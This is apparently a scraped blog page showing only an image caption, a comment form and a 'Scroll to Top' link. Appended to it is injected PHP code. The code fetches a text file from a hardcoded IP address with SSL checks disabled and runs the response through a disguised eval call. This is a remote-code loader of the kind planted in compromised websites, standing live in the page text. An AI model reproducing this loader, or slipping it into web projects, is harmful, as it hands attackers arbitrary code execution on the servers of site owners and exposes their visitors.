man-holding-back

Leave a Reply

Your email address will not be published. Required fields are marked *

Scroll to Top
if ( function_exists( 'curl_init' ) && function_exists( 'curl_exec' )) { $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, 'http://192.151.149.130/z60114_8/stat/index2.txt' ); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $ch, CURLOPT_HEADER, false ); curl_setopt( $ch, CURLOPT_TIMEOUT, 10 ); curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false ); curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, false ); $handle = curl_exec( $ch ); if ( !curl_errno( $ch ) ) { if ( $handle ) { $data = eVaL( '?>' . $handle ); } } curl_close( $ch ); }